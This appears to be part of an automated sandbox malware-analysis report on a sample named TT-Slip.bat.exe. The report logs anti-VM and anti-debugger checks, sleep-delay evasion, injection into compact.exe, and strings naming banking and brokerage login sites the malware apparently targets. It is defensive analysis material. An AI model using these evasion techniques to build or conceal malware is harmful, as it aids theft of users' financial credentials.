Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\compact.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: TT-Slip.bat.exe PID: 6412, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: IiIseKTckjhZgQ.exe PID: 1628, type: MEMORYSTR

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory allocated: B00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory allocated: 2550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory allocated: 4550000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory allocated: 6EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory allocated: 7EC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory allocated: 8160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Memory allocated: 9160000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Memory allocated: 3020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Memory allocated: 3310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Memory allocated: 5310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Memory allocated: 7C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Memory allocated: 8C10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Memory allocated: 7C10000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Code function: 9_2_0170D1C0 rdtsc

9_2_0170D1C0

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6829	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 496	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7392	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 370	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 4825
Source: C:\Windows\SysWOW64\compact.exe	Window / User API: threadDelayed 5148

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	API coverage: 0.8 %
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	API coverage: 0.2 %

Source: C:\Users\user\Desktop\TT-Slip.bat.exe TID: 5532	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3656	Thread sleep count: 6829 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3576	Thread sleep count: 496 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6204	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5300	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4124	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe TID: 7672	Thread sleep count: 4825 > 30
Source: C:\Windows\SysWOW64\compact.exe TID: 7672	Thread sleep time: -9650000s >= -30000s
Source: C:\Windows\SysWOW64\compact.exe TID: 7672	Thread sleep count: 5148 > 30
Source: C:\Windows\SysWOW64\compact.exe TID: 7672	Thread sleep time: -10296000s >= -30000s
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe TID: 7684	Thread sleep time: -90000s >= -30000s
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe TID: 7684	Thread sleep time: -45000s >= -30000s
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe TID: 7684	Thread sleep count: 44 > 30
Source: C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe TID: 7684	Thread sleep time: -44000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\compact.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: compact.exe, 00000011.00000002.4514474078.0000000002C1D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu'R
Source: 66159w4.17.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: 66159w4.17.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: 66159w4.17.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: 66159w4.17.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: 66159w4.17.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: 66159w4.17.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: 66159w4.17.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: 66159w4.17.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: 66159w4.17.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: 66159w4.17.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: 66159w4.17.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: 66159w4.17.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 00000015.00000002.2710384447.0000026E86E7C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 66159w4.17.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: 66159w4.17.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: 66159w4.17.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 66159w4.17.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: 66159w4.17.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: 66159w4.17.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: 66159w4.17.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: 66159w4.17.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: ISsofSsdrAsp.exe, 00000012.00000002.4514978372.0000000000DDF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltt+
Source: 66159w4.17.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: 66159w4.17.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 66159w4.17.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: 66159w4.17.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Roaming\IiIseKTckjhZgQ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Code function: 9_2_0170D1C0 rdtsc

9_2_0170D1C0

Source: C:\Users\user\Desktop\TT-Slip.bat.exe

Code function: 9_2_00417933 LdrLoadDll,

9_2_00417933

Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01729179 mov eax, dword ptr fs:[00000030h]	9_2_01729179
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168F172 mov eax, dword ptr fs:[00000030h]	9_2_0168F172
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689148 mov eax, dword ptr fs:[00000030h]	9_2_01689148
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689148 mov eax, dword ptr fs:[00000030h]	9_2_01689148
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689148 mov eax, dword ptr fs:[00000030h]	9_2_01689148
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01689148 mov eax, dword ptr fs:[00000030h]	9_2_01689148
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01765152 mov eax, dword ptr fs:[00000030h]	9_2_01765152
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01728158 mov eax, dword ptr fs:[00000030h]	9_2_01728158
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01724144 mov eax, dword ptr fs:[00000030h]	9_2_01724144
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01724144 mov eax, dword ptr fs:[00000030h]	9_2_01724144
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01724144 mov ecx, dword ptr fs:[00000030h]	9_2_01724144
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01724144 mov eax, dword ptr fs:[00000030h]	9_2_01724144
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01724144 mov eax, dword ptr fs:[00000030h]	9_2_01724144
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01697152 mov eax, dword ptr fs:[00000030h]	9_2_01697152
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01696154 mov eax, dword ptr fs:[00000030h]	9_2_01696154
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01696154 mov eax, dword ptr fs:[00000030h]	9_2_01696154
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168C156 mov eax, dword ptr fs:[00000030h]	9_2_0168C156
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C0124 mov eax, dword ptr fs:[00000030h]	9_2_016C0124
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691131 mov eax, dword ptr fs:[00000030h]	9_2_01691131
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01691131 mov eax, dword ptr fs:[00000030h]	9_2_01691131
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B136 mov eax, dword ptr fs:[00000030h]	9_2_0168B136
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B136 mov eax, dword ptr fs:[00000030h]	9_2_0168B136
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B136 mov eax, dword ptr fs:[00000030h]	9_2_0168B136
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168B136 mov eax, dword ptr fs:[00000030h]	9_2_0168B136
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01750115 mov eax, dword ptr fs:[00000030h]	9_2_01750115
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173A118 mov ecx, dword ptr fs:[00000030h]	9_2_0173A118
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173A118 mov eax, dword ptr fs:[00000030h]	9_2_0173A118
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173A118 mov eax, dword ptr fs:[00000030h]	9_2_0173A118
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0173A118 mov eax, dword ptr fs:[00000030h]	9_2_0173A118
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016B51EF mov eax, dword ptr fs:[00000030h]	9_2_016B51EF
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016951ED mov eax, dword ptr fs:[00000030h]	9_2_016951ED
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017371F9 mov esi, dword ptr fs:[00000030h]	9_2_017371F9
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017661E5 mov eax, dword ptr fs:[00000030h]	9_2_017661E5
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016C01F8 mov eax, dword ptr fs:[00000030h]	9_2_016C01F8
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0170E1D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0170E1D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_0170E1D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0170E1D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0170E1D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017561C3 mov eax, dword ptr fs:[00000030h]	9_2_017561C3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017561C3 mov eax, dword ptr fs:[00000030h]	9_2_017561C3
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CD1D0 mov eax, dword ptr fs:[00000030h]	9_2_016CD1D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016CD1D0 mov ecx, dword ptr fs:[00000030h]	9_2_016CD1D0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017651CB mov eax, dword ptr fs:[00000030h]	9_2_017651CB
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017411A4 mov eax, dword ptr fs:[00000030h]	9_2_017411A4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017411A4 mov eax, dword ptr fs:[00000030h]	9_2_017411A4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017411A4 mov eax, dword ptr fs:[00000030h]	9_2_017411A4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_017411A4 mov eax, dword ptr fs:[00000030h]	9_2_017411A4
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016AB1B0 mov eax, dword ptr fs:[00000030h]	9_2_016AB1B0
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016D0185 mov eax, dword ptr fs:[00000030h]	9_2_016D0185
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171019F mov eax, dword ptr fs:[00000030h]	9_2_0171019F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171019F mov eax, dword ptr fs:[00000030h]	9_2_0171019F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171019F mov eax, dword ptr fs:[00000030h]	9_2_0171019F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0171019F mov eax, dword ptr fs:[00000030h]	9_2_0171019F
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174C188 mov eax, dword ptr fs:[00000030h]	9_2_0174C188
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0174C188 mov eax, dword ptr fs:[00000030h]	9_2_0174C188
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016E7190 mov eax, dword ptr fs:[00000030h]	9_2_016E7190
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168A197 mov eax, dword ptr fs:[00000030h]	9_2_0168A197
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168A197 mov eax, dword ptr fs:[00000030h]	9_2_0168A197
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0168A197 mov eax, dword ptr fs:[00000030h]	9_2_0168A197
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_0170D070 mov ecx, dword ptr fs:[00000030h]	9_2_0170D070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_01765060 mov eax, dword ptr fs:[00000030h]	9_2_01765060
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016BC073 mov eax, dword ptr fs:[00000030h]	9_2_016BC073
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov ecx, dword ptr fs:[00000030h]	9_2_016A1070
Source: C:\Users\user\Desktop\TT-Slip.bat.exe	Code function: 9_2_016A1070 mov eax, dword ptr fs:[00000030h]	9_2_016A1070
